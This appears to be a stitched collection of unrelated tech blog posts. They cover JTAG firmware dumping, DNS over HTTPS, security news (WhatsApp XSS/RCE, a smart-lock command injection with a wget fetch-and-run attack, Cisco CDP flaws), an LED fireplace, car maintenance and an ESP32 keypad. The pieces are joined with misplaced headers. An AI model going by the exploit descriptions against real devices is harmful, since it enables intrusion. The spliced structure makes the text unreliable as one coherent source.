If not, it might be because you haven’t mastered the basics of JTAG and learned how to dump, or snarf, the firmware of an embedded device. This JTAG primer will get you up to snuff on snarfing, and help you build your reverse engineering skills.
Whatever your motivation for diving into reverse engineering devices with microcontrollers, JTAG skills are a must, and [Sergio Prado]’s guide will get you going. He starts with a description and brief history of the Joint Test Action Group interface, from its humble beginnings as a PCB testing standard to the de facto standard for testing, debugging, and flashing firmware onto devices. He covers how to locate the JTAG pads – even when they’ve been purposely obfuscated – including the use of brute-force tools like the JTAGulator. Once you’ve got a connection, his tutorial helps you find the firmware in flash memory and snarf it up to a file for inspection, modification, or whatever else you have planned.
We always appreciate guides like these that cover the basics, since not everyone is in the same place in their hardware hacking journey. This puts us in the mood to crack something open and start looking for pins, if for no other reason than to get some practice.
Since our work on DoH began, many browsers have joined in announcing their plans to support DoH, and we’ve even seen major websites like Facebook move to support a more secure DNS. If you’re interested in exactly how DoH protects your browsing history, here’s an in-depth explainer by Lin Clark. We’re enabling DoH by default only in the US. If you’re outside of the US and would like to enable DoH, you’re welcome to do so by going to Settings, then General, then scroll down to Networking Settings and click the Settings button on the right. Here you can enable DNS over HTTPS by clicking, and a checkbox will appear. By default, this change will send your encrypted DNS requests to Cloudflare.
Google Photos is handy. You take pictures and videos on your cell phone, and they automatically upload to the cloud. If you’re anything like me, however, every snap comes with a self-reminder that “the cloud” is a fancy name for someone else’s server. What could possibly go wrong? How about some of your videos randomly included in another user’s downloads?
Confirmed by Google themselves, this bug hit those using Google Takeout, the service that allows you to download all your data from a Google application, as a single archive. Google Photos archives downloaded between November 21 and November 25 may contain videos from other users, according to a notice sent to the users who downloaded said archives. It’s notable that those notices haven’t been sent to users who’s videos were exposed.
Whatsapp has been in the news for a couple reasons in the last few days. I’ll leave it to you to decide if the stories are related. First, Jeff Bezos seems to have had some of his accounts or devices compromised by Saudi agents. The popular theory is that a video sent over Whatsapp contained an exploit, which when downloaded on Bezos’ iPhone, resulted in a persistent compromise. This theory seems to be supported by an analysis by FTI.
Reading through the report is… underwhelming. The video they suspect to have been the compromise vector wasn’t ever successfully decrypted. No actual Indicators of Compromise were found, and no maliciously changed systems files were identified. The closest thing to a smoking gun found in the report is the vast amounts of outgoing data observed after the potential compromise. There are questions about the usefulness of that metric, and Robert Graham does a good job debunking the report.
Whatsapp *has* had several highprofilevulnerabilities that could have been used to pull off an attack like this. Which brings us to the topic of vulnerabilities in Whatsapp, so here’s one in the desktop app.
[Gal Weizman] discovered a weird Whatsapp problem in 2017. When using the web interface, and sending a message that quoted a previous message, it was possible to manipulate the message being quoted, putting words in someone’s mouth. He found it amusing, but eventually came back to take a more serious look at what he’s found. He discovered that he could also hijack the link preview banner, giving him a cross site scripting attack. That would be a serious enough vulnerability in itself, but not content with XSS, [Gal] took things one step further.
Whatsapp offers a native desktop app, using the Electron framework. Electron essentially lets you package a web app in native form. Under the hood, it’s simply a browser bundled with the web-based code. A consequence of Electron is that a XSS vulnerability will likely work in an Electron app as well. This was no exception, and since Whatsapp was shipping their app with an ancient version of Electron, an old Chrome vulnerability was still present, resulting in a viable RCE that escapes the Electron app.
Whatsapp has released updates that address these issues, so if you have desktop Whatsapp installed, go make sure it’s up to date!
I got Phished
You’re familiar with haveibeenpwned.com. Have you ever thought to yourself, if only there was a service that alerted me when one of my domains showed up in phishing attack…. I Got Phished is the service for you. It’s intended for a company’s security team to sign up with the company domains. When an email address from one of those domains shows up in a phishing database, the team gets an email alerting them.
All it takes to sign up is the abuse@, postmaster@, noc@, or security@ email address for the domain you want to monitor. So gmail users, you’re out of luck. If you run your own domain, then maybe it’s worth signing up for the service.
Cisco Security DOOMed by CDPwn
A series of smart locks made by Nortek Security & Control has a vulnerability that is now being actively exploited. A PHP endpoint on those devices failed to sanitize inputs properly, runs as root, and can be used to run arbitrary commands. “card_scan+decoder.php” is accessible over http, and anything in the “door” parameter is executed as root. The active attack uses wget to grab a file from a remote server and run that file.
To exploit this flaw remotely, the endpoint has to be accessible, which means that only devices with a public IP addresses are vulnerable so far. The limited IPv4 address space and widespread usage of NAT has once again blunted the impact of a really serious vulnerability. It will be interesting to watch what happens with the growing popularity of IPv6, as more and less secure devices get their own IP addresses.
Doom on a Desk Phone
Researchers at Armis have published their research into Cisco hardware under the name CDPwn, inspired by Cisco’s CDP (Cisco Discovery Protocol). The interesting details are available in their whitepaper, but before we get to that, take a moment to watch the video embedded below, as it combines a couple of our favorite things here at Hackaday: security vulnerabilities, and running Doom on unexpected hardware.
Cisco manufacturers hundreds of different devices, and one of their selling points is interoperability. You plug a Cisco phone into a Cisco switch, and they do some autoconfiguration magic, setting up proper VLANs, etc. Many of these features depend on proprietary Cisco protocols, and one of the most important is CDP. This layer-2 protocol allows devices to communicate with each other, regardless of what VLAN they’re set to. After looking at previously discovered CDP flaws, the guys at Armis got to work. Their first discovery was a Denial of Service attack. A packet informing a neighboring device about addresses lacked a reasonable upper bound on the number of addresses described. An incoming packet could claim to be describing three billion addresses, and the target device would simply crash trying to allocate enough memory to handle the packet.
One surprising discovery is that the CDP implementation seems to be built from scratch for different Cisco product lines. While this means that a single vulnerability can’t be leveraged across every device, it does suggest that more vulnerabilities will exist overall, and will take longer to fix. In VoIP phones, for example, the PortID TLV (Type-LengthValue) is copied into a static buffer without proper length checks. It’s a trivial buffer overflow, easily leading to exploitation.
Cisco has firmware updates available for the affected devices. These aren’t particularly sophisticated attacks. It appears once again, that a reputable brand name doesn’t guarantee quality code running under the hood.
Ask anyone who’s ever tuned into Fireplace TV on a cold winter’s night — even though you can’t feel the heat or roast a marshmallow with it, fake fire is almost as soothing as the real thing. And if you have kids or pets, it’s a whole lot safer. But why go to the expense of buying a lighted insert when you could just make your own?
You don’t even need to get fancy with a microcontroller and RGB LEDs, either — just do what [Ham-made] did and dismantle some LED flame bulbs. They already have everything you need, and the flex PCB makes them easy to work with.
[Ham-made] adhered three bulbs’ worth to a piece of foam board with double-stick tape, soldered all the leads together, and wired in a toggle switch and a 2xAA battery pack. The bulbs each had a tilt switch so that the “flames” flow upward regardless of orientation, but [Ham-made] removed those to avoid flickering connectivity and fights with the toggle switch.
Once it was all wired up, [Ham-made] hot-glued some magnets to the foam board and attached it to the underside of the grate to keep it safe from the logs and the ash pit, while still allowing the glow to emanate from the right spot for realism. The only thing missing are the crackles and pops, and [Ham-made] is burning to hear your implementation ideas.
[Ham-made] wasn’t using his fireplace in the traditional way because the house is smallish and centrally heated. But if you rely on yours to keep you warm and cozy, why not make it voice-activated?
Doing necessary maintenance on time is key to enjoying your project car. Too many gearheads know the pain of a neglected beast that spends more time up on jackstands than out on the road. Buying the right car, and keeping a close eye on what needs to be done, will go a long way to improving your experience and relationship with your ride.
If you’ve just bought a car, no matter how good things look, it’s a good idea to go through things with a fine-tooth comb to make sure everything’s up to scratch. This can avoid expensive damage down the line, and is a great way to get your feet wet if you’re new to working on cars. Here’s a bunch of easy jobs you can tackle as a novice that will keep your ride in tip-top condition.
Your car relies on a variety of highly-engineered fluids in order to run smoothly and reliably. Using the right fluids and changing them at regular intervals is important to ensure your car performs well. While the seller may have assured you that everything’s been changed on schedule, the first thing you should be doing when you get your project home is to change the fluids.
Engine oil is perhaps the most important. Over time, contaminants build up in the oil and it begins to lose its effectiveness as a lubricant. Left too long, and your oil pump can clog and you’ll lose oil pressure, destroying your engine in mere seconds. Alternatively, metallic particles can build up as the engine wears, and your oil filter can only do so much. You want to keep your oil fresh and of the appropriate grade, with most manufacturers recommending a set time period or mileage amount to change the oil. This is an easy job on the vast majority of cars, though you might find some difficulty in reaching your oil filter (looking at you, Miata). It’s a great way to get comfortable working on your car – just make sure you put the new oil in before you start the engine, else you’ve almost certainly ruined your ride. You can even send samples of your oil away for analysis that can help diagnose long-term issues. Oh, and be sure to us a new filter every time – and keep an eye out for leaks!
Coolant is also an important fluid to check and change regularly. If it looks rusty and brown, your engine components are corroding and that’s no good for the long time health of your ride. Thankfully, it’s easy to change: most cars having a tap to help dump the coolant before you top it up. If things are particularly dirty, you might want to run a coolant flush solution through the system before you replace the fluid. Just make sure you burp the air out of the system properly before heading out back on the road, lest you overheat your engine.
Other fluids in your car are generally have quite long intervals before service is required. Automatic transmissions often recommend oil changes quite rarely; more than 100,000 km is common. Similar intervals are typical for manual transmissions and differential oil. If you’ve just got the car and it’s shifting and driving well, you’re likely safe to leave these alone. They’re a little more difficult to tackle, usually, so consider approaching these once you’ve gotten a little more comfortable with the wrenches.
Filters play an important role, ensuring your car doesn’t clog its fuel injectors every time you fill up at a dodgy gas station, or making sure sand doesn’t wreck the cylinder bores. However, they get clogged over time, leading to reduced performance and other niggling issues. Thankfully, they’re often cheap and easy to change, and are easily handled by the shadetree mechanic.
Air filters are the engine’s main protection from dust and particulates. Often made out of paper or foam, they’re usually located in an accessible spot next to or on top of the engine, and a simple visual inspection is usually enough to tell if they need replacement. If they’re dirty or falling apart, swap it out. If it’s covered in oil, you’ll also want a new one, though that ‘s indicative you have other problems. Generally, a high quality OEM filter is the best replacement. There’s little to be gained by swapping to a pod-filter or a cheap eBay intake, unless you really know what you’re doing and are sourcing high quality parts.
Fuel filters are responsible for making sure the tiny passages of your carburetor or injectors don’t get blocked with detritus in fuel. If you’re having strange issues with stumbling or a lack of acceleration, you might find your fuel filter is nearing the end of its life. When they get clogged, fuel pressure drops and this can lead to performance issues. Carbureted cars often have one or more inline filters that can be swapped out with little more than a screwdriver. Fuel injected cars can be a little more complex and often have multiple filters, but they’re still fairly straightforward to change if you know where to look. Their in-tank pumps also have a special filter sock on them, but these usually last as long as the pump and you needn’t worry about them too much.
Wheels and Tires
Ask around the racetrack about how to start making your car faster, and the first thing you’ll get told is “tires, tires, tires”. Your tires are the interface between your car and the road, and no matter what you do to the rest of the car, if you’ve got bad tires, it’ll all be for naught. It’s not just about speed on the track, though – whether you’re driving on the street or off-road, a good set of tires is important to keep your car pointed the right way, and avoid ending upside down in a ditch.
Oftentimes, project cars can come with a mismatched set of wheels and tires, or completely bald rubber. Worst case, you’ve dragged something out of a barn or a field, and it’s sitting on rubber well over 10 years old. Just because they have tread and hold air, doesn’t mean they’re safe to drive on. Rubber doesn’t age well, and unless your new ride has a set of fresh meats with plenty of tread and a current date code, you’ll want to get them replaced.
It’s also important to pay attention to wheel and tire size. Putting huge rims on your car can look cool to some, but it’s often a great way to spoil your handling. There’s no need to stick rigidly to the manufacturer’s standard wheels, of course – these can be ugly and boring, after all. The best way to get the right wheels and tires is to talk to other enthusiasts that have builds similar to what you’re going for. They’ll be able to tell you what works for your car, with your suspension setup, and your intended goals.
For example, the original NA Miata came with 14″ x 5″ wheels. These are fine for getting about town, but for track use, they’re too skinny to generate much grip. It’s also difficult to find good rubber to suit 14″ wheels these days; there are options available, but they’re expensive and obscure. By asking around forums, and chatting to the old hands at the track, I was able to learn that a set of 15″ wheels between 7″-8″ wide would be a good bet, ideally with an offset between +20 and +35 to make sure they nicely filled the guards. Armed with this knowledge, I was able to purchase a set of wheels that looked great and fit properly without needing any wheel spacers or other ugly hacks. Wrapped in some sticky semi-slicks, my lap times dropped by 4 seconds overnight! By doing my research, I got a great result without wasting any time or money.
It’s likely that, as you’ve bought a project, your car has a few issues. Maybe it’s got a noisy exhaust, or it’s using more fuel than it should. While these may not get in the way of your car getting from A to B, they can dull your enjoyment significantly, and add to the financial burden of having a project car. However, fixing these issues is a great way to start learning about how your car works!
Diagnosis can be tough for the beginner, particularly when faced with a tricky problem, minimal tools, and limited experience. Many will guess at the cause of the problem, and begin replacing parts only to find the issue reoccurring time and again. Ideally, finding the root cause of an issue is more productive. This is achieved by logically looking at the symptoms, and testing parts and subsystems to see that they are indeed properly operational. This involves learning how to use a multimeter, pressure gauges, and all manner of other equipment. This can be expensive, but can pay off down the road. Oftentimes, it’s important to weigh up buying more tools versus simply taking the car to a shop that already has the gear.
The one tool that any wrencher should have for working on OBD-II equipped cars is the scantool. This plugs into the diagnostic port in post-1996 vehicles, and allows the ECU to communicate fault codes to the driver. This is helpful in a wide variety of situations. For example, if your fuel economy is poor, and your scantool reports a bad oxygen sensor signal, it’s simple to replace the part and get things up and running again. Other problems, like misfires, can be more difficult to diagnose, but a scantool still helps point you in the right direction.
Thankfully, many parts of the car community are eager to share their knowledge and passion with those eager to learn. Facebook groups, forums, and similar gatherings are great places to look for help. Often, your problem will have been faced by many before, and simply putting the symptoms into Google will net the answers you need. Else, reach out, and start a conversation with those that may be able to help. Finding a good local mechanic can also be helpful. While many shops simply exist to get cars in and out the door, others often specialize in certain makes and models and are willing to work with enthusiasts who need a little help on their journey toward working on their car. I’ve been lucky myself to know several great mechanics, who were able to step in and solve a couple of sticky issues that were just outside of my own abilities to solve. After picking up the car, I’ve learned a lot from a quick chat about what they had to do to fix the problem!
It’s a Marathon, Not A Sprint
For the newly initiated into the automotive hobby, it can sometimes feel like too much. If you’ve just started poking around under the hood of your new ride and found a mess of wires, bodged hoses and a forest of zipties, you might be a little overwhelmed. However, through regular maintenance, consultation with those in the know and a little perseverance, you can learn a lot and build yourself a sweet ride along the way. Happy hacking!
Most people associate the ESP family of microcontrollers with WiFi, which makes sense as they’ve become the solution of choice for getting your project online quickly and easily. But while the WiFi capability might be the star of the show, the ESP32 also comes equipped with Bluetooth; we just don’t see people using it nearly as often. If you’re looking to get started using Bluetooth on the ESP32, then this simple wireless macro keypad from [Brian Lough] would be a great way to get started.
From a hardware standpoint, this project is incredibly straightforward. All you need to do is connect a membrane keypad up to the GPIO pins on the ESP32. Adding in a battery is a nice touch, and you probably would want to put it into a enclosure of some sort, but as a proof of concept it doesn’t get much easier than this. In this case [Brian] is using the TinyPICO board, but your personal ESP32 variant of choice will work just as well.
The rest of the project is all software, which [Brian] walks us through in the video after the break. There’s a preexisting library for Bluetooth Human Interface Device (HID) emulation on the ESP32, but it needs to be manually installed in the Arduino IDE. From there, he demonstrates how you can build up a functioning keyboard, including tricks such as sending multiple virtual keys at once.
In the past we’ve seen the ESP32 used to create a Bluetooth game controller, but the ability to emulate a keyboard obviously offers quite a bit more flexibility. With a practical demonstration of how easy as it is to turn this low-cost microcontroller into a wireless input device, hopefully we’ll start seeing more projects that utilize the capability.